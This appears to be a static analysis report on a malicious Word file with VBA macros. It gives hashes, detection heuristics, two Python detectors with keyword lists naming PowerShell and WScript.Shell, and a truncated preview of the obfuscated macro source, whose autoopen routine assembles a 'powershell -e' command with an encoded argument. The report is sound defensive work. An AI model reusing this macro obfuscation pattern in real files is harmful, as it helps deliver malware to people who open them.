Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2a083b74b963d4cf…

MALICIOUS

Office (OLE)

Size: 204.6 KB
Created: 2019-03-13 06:33:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 143857453363d20526c7ec4ccaced19b
SHA-1: 56a540d635234dfa40d157c57efc2b91ec3c19fa
SHA-256: 2a083b74b963d4cf26db34ee675f3142a7be535da19ddcc1caee23f192bfdda0
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1027 Obfuscated Files or Information

The sample is a malicious Word document containing heavily obfuscated VBA macros. Heuristics indicate a legacy auto-exec entry point (Sub autoopen()) and a GetObject call, combined with string splitting that reassembles API names such as 'Win32_Process' from fragments that never appear whole in the source. The extracted source preview shows the same technique building a command line: the literals "po", "wersh" and "ell -e " are concatenated, interleaved with variables, into "powershell -e " followed by an encoded command, and On Error Resume Next at the top of autoopen suppresses any failure. The rest of each procedure is filler: Chr/ChrW calls and large numeric expressions on variables that are never assigned, present only to pad and obscure the code. This indicates the macro's primary purpose is to execute code, most likely to download and run a second-stage payload. The encoded PowerShell argument is held in variables whose assignments are not in the preview, so the second-stage URL is not recoverable from this listing alone.
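The split-literal reassembly described above, which the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION heuristic further down scores, can be checked directly on extracted VBA source. The following Python is an added example written for this report, not the scanner's own code: it joins the string literals inside each + / & concatenation chain and flags a dangerous name that appears in the joined text but in none of the individual literals. The keyword list and the sample VBA (which reuses the concatenation line from the preview below plus a constructed Win32_Process line) are assumptions; variables sitting between the literals are skipped, so the reassembled text is a lower bound on what the macro builds at runtime.

```python
"""Resolve VBA string-literal concatenation and flag dangerous names that only
exist after the join (the idea behind OLE_VBA_SPLIT_KEYWORD_OBFUSCATION).
Added example for this report; keyword list and sample source are assumptions."""
import re
from typing import Iterator

DANGEROUS_KEYWORDS = (
    "scripting.filesystemobject", "wscript.shell", "shell.application",
    "powershell", "urldownloadtofile", "winmgmts:", "win32_process",
)

_LITERAL = r'"(?:[^"]|"")*"'                          # VBA literal; "" escapes a quote
_OPERAND = rf'(?:{_LITERAL}|[A-Za-z_][A-Za-z0-9_]*)'  # literal or bare identifier
_CHAIN = re.compile(rf'{_OPERAND}(?:\s*[+&]\s*{_OPERAND})+')  # a + b & "c" ...
_LITERAL_RE = re.compile(_LITERAL)


def _strip_comment(line: str) -> str:
    """Drop a trailing ' comment without being fooled by ' inside a literal."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def _logical_lines(source: str) -> Iterator[tuple[int, str]]:
    """Yield (first physical line number, text) with ' _' continuations joined."""
    buf: list[str] = []
    start = 0
    for n, raw in enumerate(source.splitlines(), 1):
        text = _strip_comment(raw.rstrip())
        if not buf:
            start = n
        if text.endswith(" _"):
            buf.append(text[:-2])
            continue
        buf.append(text)
        yield start, " ".join(buf)
        buf = []
    if buf:
        yield start, " ".join(buf)


def find_split_keywords(source: str) -> list[dict]:
    """One finding per concatenation chain whose joined literals spell a
    dangerous keyword that no single literal contains. Identifiers in the
    chain are skipped, so the joined text is a lower bound on the runtime value."""
    findings = []
    for lineno, text in _logical_lines(source):
        for chain in _CHAIN.finditer(text):
            literals = [m.group(0)[1:-1].replace('""', '"')
                        for m in _LITERAL_RE.finditer(chain.group(0))]
            if len(literals) < 2:
                continue
            joined = "".join(literals)
            for kw in DANGEROUS_KEYWORDS:
                if kw in joined.lower() and not any(kw in s.lower() for s in literals):
                    findings.append({"line": lineno, "keyword": kw,
                                     "literals": literals, "joined": joined})
    return findings


# Constructed sample: line 3 is the concatenation from the extracted macro
# preview; line 4 is a made-up split of Win32_Process; line 5 is unsplit and
# must not fire; the comment on line 4 must be ignored.
SAMPLE_VBA = '''Sub autoopen()
On Error Resume Next
HA1GUAw (UA_B_QU + "po" + FcAAADU_ + "wersh" + aXDAAQA + "ell -e " + kAAADo + zAQA1AZG + lQADQcCx + PX4QAk + v1U_AA)
x = "Win32_" & "Pro" & "cess" ' a comment mentioning "WScript.Shell" is not code
y = "WScript.Shell"
End Sub
'''

if __name__ == "__main__":
    for f in find_split_keywords(SAMPLE_VBA):
        print(f"line {f['line']}: {f['keyword']!r} from {f['literals']} -> {f['joined']!r}")
```

Running it against the sample reports two chains: "powershell -e " on the autoopen line and "Win32_Process" on the constructed line, while the intact "WScript.Shell" literal and the comment produce nothing. In VBA an unassigned Variant is Empty and Empty + "po" yields "po", so the interleaved variables do not break the join unless they are assigned elsewhere, which is why the scanner can ignore them and still see the keyword.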

Heuristics (8)

  • ClamAV: Doc.Malware.Obfuse-6903012-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Obfuse-6903012-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning. In this sample the preview below shows "po" + "wersh" + "ell -e " being joined around variables into a "powershell -e " command line.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    Document defines Sub autoopen(), which Word runs automatically when the document is opened with macros enabled; it is the entry point of the visible payload code.
  • GetObject call (high) OLE_VBA_GETOBJ
    The macro calls GetObject, which obtains a COM automation object from a moniker; macro malware commonly uses it to reach WMI (for example a winmgmts: moniker and Win32_Process) and spawn a process without a visible CreateObject or Shell call.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (macros.bas below), so here the marker duplicates the AutoOpen finding rather than adding independent evidence.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into drawing/shape markup; it is never contacted at runtime and should not be treated as a network indicator or added to a blocklist.
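The p-code fallback heuristic above is a co-occurrence test over a stream in which no source could be recovered. The Python below is an added example, not the report's scanner: it searches a raw VBA stream for auto-exec names together with shell/download/object tokens, in both ANSI and UTF-16LE form because VBA project streams store identifiers in both encodings, and returns byte offsets so an analyst can confirm each hit in a hex view. The token lists and the constructed stream bytes are assumptions. Plain substring matching means a token such as "shell" also fires inside harmless identifiers, so hits are leads to confirm, not a verdict.

```python
"""Co-occurrence test in the style of OLE_VBA_PCODE_AUTOEXEC_EXEC: look for an
auto-exec name together with shell/download/object tokens in a raw VBA stream
when no source could be decompressed. Added example; the token lists and the
constructed stream are assumptions, not the report's scanner."""
import re

AUTOEXEC_TOKENS = ("autoopen", "auto_open", "autoexec", "autoclose",
                   "document_open", "document_close", "workbook_open")
EXEC_TOKENS = ("shell", "createobject", "getobject", "urldownloadtofile",
               "powershell", "winmgmts", "win32_process")
# VBA project streams carry identifier names as both MBCS/ANSI and UTF-16LE,
# so a scanner that only looks for ASCII misses half the occurrences.
ENCODINGS = ("ascii", "utf-16-le")


def _find_tokens(stream: bytes, tokens) -> dict:
    """Map each token that occurs to its (offset, encoding) hits, case-insensitive.
    bytes.lower() folds only ASCII letters, which suits both encodings here."""
    haystack = stream.lower()
    hits: dict = {}
    for tok in tokens:
        for enc in ENCODINGS:
            needle = tok.encode(enc).lower()
            for m in re.finditer(re.escape(needle), haystack):
                hits.setdefault(tok, []).append((m.start(), enc))
    return hits


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Flag when at least one auto-exec name and at least one execution token
    are both present. Substring matching: 'shell' also fires inside harmless
    identifiers, so treat hits as leads to confirm in a hex view."""
    auto = _find_tokens(stream, AUTOEXEC_TOKENS)
    execs = _find_tokens(stream, EXEC_TOKENS)
    return {"flagged": bool(auto) and bool(execs), "autoexec": auto, "exec": execs}


def constructed_stream() -> bytes:
    """Stand-in for a decompressed VBA stream: identifier names in both encodings
    surrounded by opaque bytes. Constructed for the example, not real p-code."""
    return (b"\x01\x00\x2c\x00" + b"autoopen" + b"\x00\x00"
            + "autoopen".encode("utf-16-le") + b"\x7f\x00"
            + b"GetObject" + b"\x00" + "winmgmts:".encode("utf-16-le")
            + b"\x00\x00" + b"Win32_Process" + b"\xff")


def benign_stream() -> bytes:
    """Auto-exec name present but no execution token: must not be flagged."""
    return b"Attribute VB_Name = \"ThisDocument\"\x00Document_Open\x00MsgBox"


if __name__ == "__main__":
    for name, blob in (("constructed", constructed_stream()), ("benign", benign_stream())):
        r = pcode_autoexec_exec(blob)
        print(name, "flagged" if r["flagged"] else "clean", r["autoexec"], r["exec"])
```

On the constructed stream the check reports autoopen at offset 4 (ANSI) and 14 (UTF-16LE) alongside GetObject, winmgmts and Win32_Process, and stays quiet on the benign stream that only carries a Document_Open name. On a real sample, feed it the decompressed module or _VBA_PROJECT stream bytes (for instance those oletools exposes) rather than the raw OLE file.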

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   38898 bytes
SHA-256: c256514a34ce2e27f6b8a7c42fd0a1ea3ae123179d4e276ec7aaa8faae214c91
Preview: first 1,000 lines of the extracted script (listing truncated below)
Attribute VB_Name = "Z_DABwAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function VQBwDwcA()
   If zAGAGAA = DABAxA Then
LUQAGB = Chr(YXUUAAUA)
zQx1DoA = RABAAGc + ChrW(ZA1AxkXQ) * 441403071 * CBool(808982229) + 641922541 / Round(UUAAAxC) - BAx1D4Q + Sqr(288242007) - 34026037 * CByte(663329497)
wQAAZoDQ = Chr(lUAUAcD)
End If
   If bGAU_4ZA = FxAoAACC Then
j4oAAA = Chr(CUoQ1Q)
LDUA_X1 = tAwAAQAk + ChrW(vA_DAZ) * 423890639 * CBool(216600933) + 37803705 / Round(m1BCC4Q) - XABDAkoB + Sqr(2570903) - 148737031 * CByte(711622087)
jUAA1c = Chr(wAAAkA)
End If
   If JAADUA = zCA1DX Then
nDoAD1AQ = Chr(iAZCQU)
U_Ac44QU = Z_XQBX + ChrW(z4AAUB) * 513305013 * CBool(388723137) + 574423368 / Round(zXB_AAA) - m1ACA41U + Sqr(150227049) - 820400038 * CByte(172219737)
lAwXZQA_ = Chr(wABAAx)
End If
   If UAA_GAD = fAAA4A Then
z1AxxA = Chr(JAAcGBw)
PBAQAAw = LA4oXAG + ChrW(WAAUDA) * 4420613 * CBool(496174223) + 890941101 / Round(TABD4A_) - vBZAUC_ + Sqr(853976039) - 312502796 * CByte(80263922)
oUAQDA = Chr(oQBUAw_)
End If
   If BxQUAAo = lkAAk4 Then
rQ1_ACQc = Chr(sAA4xXC)
hUAAkcw = TBUkGUCB + ChrW(ODAUAx) * 34512621 * CBool(929478521) + 906839506 / Round(lccDUx) - IZQ1GAUw + Sqr(732299348) - 80019840 * CByte(854404928)
qoBAU1B = Chr(C1QAA4)
End If
   If jcBxXA = zDDXAA Then
BAADwDA = Chr(CAAQAB)
VADZA4U = IXD_A_GG + ChrW(IQAQACUA) * 172809488 * CBool(879846461) + 393322782 / Round(GBBBAAw) - PUAAQAAQ + Sqr(135885734) - 118117968 * CByte(953407130)
qZDDBD = Chr(IACGA4)
End If
   If XGBABAXZ = iQk4Do1 Then
E1ZUCxx = Chr(fQAoAAQ)
ZAc1UDGA = H1AAoA + ChrW(wc4ABUU) * 905667836 * CBool(277594522) + 594343910 / Round(pB4AAAQ) - XxXAQAX + Sqr(691490041) - 222841557 * CByte(182350531)
uBQwUA1 = Chr(pDc_AAGB)
End If
End Function
Sub autoopen()
On Error Resume Next
   If dwBxoA = vADDUcXA Then
VAZABAA = Chr(RkAQDCZc)
YAACwU = IDcABDA + ChrW(cQGCoU) * 309152852 * CBool(736654577) + 796353423 / Round(zUAxAQB4) - MAA_cU + Sqr(947806355) - 687440721 * CByte(531962725)
oAC_UD4Q = Chr(XwcAAX)
End If
   If mZABB4UG = jw1Q1AD Then
c_AoDwU = Chr(HAQ1wD)
iQ4A1QAU = L4DoAB_A + ChrW(jBAAU1) * 540009372 * CBool(782235021) + 591577056 / Round(KcA_4D) - z4AAZX + Sqr(272880954) - 38603764 * CByte(269958936)
r_4_AD = Chr(FxcxkAU)
End If
   If TxZ_XA = UXQckAZ1 Then
FZB_AAc = Chr(zCQk4B4B)
F4XkGB = XcCACAU + ChrW(iA1o_QBA) * 869732570 * CBool(858981997) + 78957533 / Round(aGBAoAA) - uAcQGowx + Sqr(93901263) - 718527163 * CByte(609434160)
iG1AA4 = Chr(loUxZ1XQ)
End If
HA1GUAw (UA_B_QU + "po" + FcAAADU_ + "wersh" + aXDAAQA + "ell -e " + kAAADo + zAQA1AZG + lQADQcCx + PX4QAk + v1U_AA)
   If hADDCZ = l1AxcUD Then
dDBoAxAc = Chr(Wc4CBDD)
JQAUkAAw = IAAAAA1 + ChrW(uoAkcB) * 292547635 * CBool(506784403) + 124428572 / Round(jAUwAXG) - lUAQBQAA + Sqr(331785275) - 673498215 * CByte(225199787)
vDCoAA = Chr(hCAAUAAU)
End If
   If Y4UAAX = vDAZCcAB Then
FAAQZ41 = Chr(jA41DAAB)
XUAAxQ = wBAUUC + ChrW(o1UDAA) * 62748113 * CBool(185621211) + 993303228 / Round(oDQkkU) - jXcxxw + Sqr(545003774) - 309160441 * CByte(254346241)
bABACQ = Chr(K1AAAB)
End If
End Sub
Function JAQUXGAD()
   If pBQAU4 = CUBDk4AA Then
zDUACxU = Chr(aCcBXA)
cBQADU = jXxAxAw + ChrW(WDQoAZC) * 832897663 * CBool(536175857) + 71052654 / Round(tD4cZA) - QAGA1AA + Sqr(678893028) - 830091208 * CByte(34998790)
i1AA4wAA = Chr(qA_QAB)
End If
   If IkUU1xA4 = DG1QZUBX Then
oAAAQD1Q = Chr(ZAC_1A)
doBAA4oG = bZkBAU + ChrW(iACAA4k) * 436287623 * CBool(193685541) + 752477889 / Round(LAkB4UAU) - okQAccXA + Sqr(256634284) - 541230560 * CByte(413618082)
KQAAcAA = Chr(vxADDA)
End If
   If jAcAUAxU = zQAAQGQc Then
TQGZZBG = Chr(tGABBDAc)
sxA1UAAD = dAA4QDB + ChrW(cBkGCk1) * 722642096 * CBool(682659876) + 370235955 / Round(jBxQZU_A) - KxUXww + Sqr(649890319) - 304389757 * CByte(210070511)
ZAkUDU = Chr(fAcBCo)
End If
   If jDkAAUGX = KAkB_QxU Then
kDA
... (truncated)